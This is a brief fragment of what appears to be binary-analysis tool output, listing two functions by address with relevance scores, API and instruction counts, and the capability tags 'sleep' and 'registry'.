Function 001ED796, Relevance: 15.1, APIs: 10, Instructions: 135
sleep

Function 001F2870, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122
registry